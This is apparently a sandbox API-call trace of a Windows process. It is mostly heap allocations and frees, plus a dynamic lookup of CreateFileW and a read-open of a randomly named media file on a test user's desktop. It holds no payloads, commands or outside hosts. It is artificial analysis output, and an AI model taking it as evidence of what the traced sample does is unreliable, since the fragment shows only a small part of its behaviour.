[0120.038] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0120.038] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.041] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0120.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.043] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0120.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.045] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.046] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\9pzjqif.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.047] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) 